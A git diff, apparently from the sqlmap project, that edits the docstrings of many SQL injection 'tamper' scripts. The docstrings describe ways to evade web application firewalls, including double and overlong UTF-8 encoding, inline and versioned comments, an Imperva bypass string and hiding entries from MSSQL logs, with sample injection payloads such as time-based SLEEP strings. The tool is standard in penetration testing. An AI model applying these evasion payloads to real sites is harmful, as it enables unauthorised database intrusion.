Replaces space character after SQL statement with a valid random blank character. Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
Afterwards replace character '=' with operator LIKE
Requirement: Requirement:
* Blue Coat SGOS with WAF activated as documented in * Blue Coat SGOS with WAF activated as documented in

View File

@@ -16,13 +16,10 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Double url-encodes all characters in a given payload (not processing Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
already encoded)
Notes: Notes:
* Useful to bypass some weak web application firewalls that do not * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset
double url-decode the request before processing it through their
ruleset
>>> tamper('SELECT FIELD FROM%20TABLE') >>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

View File

@@ -16,8 +16,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Url-encodes all characters in a given payload (not processing already URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
encoded)
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005
@@ -26,10 +25,8 @@ def tamper(payload, **kwargs):
* PostgreSQL 8.3, 8.4, 9.0 * PostgreSQL 8.3, 8.4, 9.0
Notes: Notes:
* Useful to bypass very weak web application firewalls that do not * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
url-decode the request before processing it through their ruleset * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS
* The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMS
>>> tamper('SELECT FIELD FROM%20TABLE') >>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

View File

@@ -18,8 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Unicode-url-encodes non-encoded characters in a given payload (not Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
processing already encoded)
Requirement: Requirement:
* ASP * ASP
@@ -32,9 +31,7 @@ def tamper(payload, **kwargs):
* PostgreSQL 9.0.3 * PostgreSQL 9.0.3
Notes: Notes:
* Useful to bypass weak web application firewalls that do not * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset
unicode url-decode the request before processing it through their
ruleset
>>> tamper('SELECT FIELD%20FROM TABLE') >>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

View File

@@ -13,8 +13,7 @@ __priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Unicode-escapes non-encoded characters in a given payload (not Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
processing already encoded)
Notes: Notes:
* Useful to bypass weak filtering and/or WAFs in JSON contexes * Useful to bypass weak filtering and/or WAFs in JSON contexes

View File

@@ -19,7 +19,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -19,7 +19,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -16,7 +16,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Prepends (inline) comment before parentheses Prepends (inline) comment before parentheses (e.g. ( -> /**/()
Tested against: Tested against:
* Microsoft SQL Server * Microsoft SQL Server

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -19,7 +19,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces all occurrences of operator equal ('=') with operator 'LIKE' Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Slash escape quotes (' and ") Slash escape single and double quotes (e.g. ' -> \')
>>> tamper('1" AND SLEEP(5)#') >>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#' '1\\\\" AND SLEEP(5)#'

View File

@@ -21,7 +21,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Adds versioned MySQL comment before each keyword Adds (MySQL) versioned comment before each keyword
Requirement: Requirement:
* MySQL < 5.1 * MySQL < 5.1

View File

@@ -16,7 +16,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
HTML encode (using code points) all non-alphanumeric characters HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)
>>> tamper("1' AND SLEEP(5)#") >>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;' '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -14,7 +14,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -13,7 +13,7 @@ __priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'

View File

@@ -17,7 +17,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces each keyword character with lower case value Replaces each keyword character with lower case value (e.g. SELECT -> select)
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005

View File

@@ -19,7 +19,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Embraces complete query with versioned comment Embraces complete query with (MySQL) versioned comment
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Embraces complete query with zero-versioned comment Embraces complete query with (MySQL) zero-versioned comment
Requirement: Requirement:
* MySQL * MySQL

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Adds multiple spaces around SQL keywords Adds multiple spaces (' ') around SQL keywords
Notes: Notes:
* Useful to bypass very weak and bespoke web application firewalls * Useful to bypass very weak and bespoke web application firewalls

View File

@@ -15,8 +15,7 @@ __priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces predefined SQL keywords with representations Replaces predefined SQL keywords with representations suitable for replacement filters (e.g. SELECT -> SELSELECTECT)
suitable for replacement (e.g. .replace("SELECT", "")) filters
Notes: Notes:
* Useful to bypass very weak custom filters * Useful to bypass very weak custom filters

View File

@@ -16,10 +16,11 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Converts all (non-alphanum) characters in a given payload (not processing already encoded) Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)
Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ Reference:
Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
* https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1' 'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'

View File

@@ -16,10 +16,11 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Converts all characters in a given payload (not processing already encoded) Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ Reference:
Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
* https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Adds a percentage sign ('%') infront of each character Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)
Requirement: Requirement:
* ASP * ASP

View File

@@ -20,7 +20,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces plus ('+') character with function CONCAT() Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
Tested against: Tested against:
* Microsoft SQL Server 2012 * Microsoft SQL Server 2012

View File

@@ -20,7 +20,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces plus ('+') character with ODBC function {fn CONCAT()} Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
Tested against: Tested against:
* Microsoft SQL Server 2008 * Microsoft SQL Server 2008

View File

@@ -18,7 +18,7 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Replaces each keyword character with random case value Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
Tested against: Tested against:
* Microsoft SQL Server 2005 * Microsoft SQL Server 2005

View File

@@ -15,7 +15,7 @@ __priority__ = PRIORITY.LOW
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Add random comments to SQL keywords Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)
>>> import random >>> import random
>>> random.seed(0) >>> random.seed(0)

View File

@@ -14,11 +14,10 @@ def dependencies():
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Appends special crafted string Appends special crafted string for bypassing Imperva SecureSphere WAF
Notes: Reference:
* Useful for bypassing Imperva SecureSphere WAF * http://seclists.org/fulldisclosure/2011/May/163
* Reference: http://seclists.org/fulldisclosure/2011/May/163
>>> tamper('1 AND 1=1') >>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'" "1 AND 1=1 and '0having'='0having'"

View File

@@ -11,7 +11,7 @@ __priority__ = PRIORITY.HIGH
def tamper(payload, **kwargs): def tamper(payload, **kwargs):
""" """
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Requirement: Requirement:
* MSSQL * MSSQL

Some files were not shown because too many files have changed in this diff Show More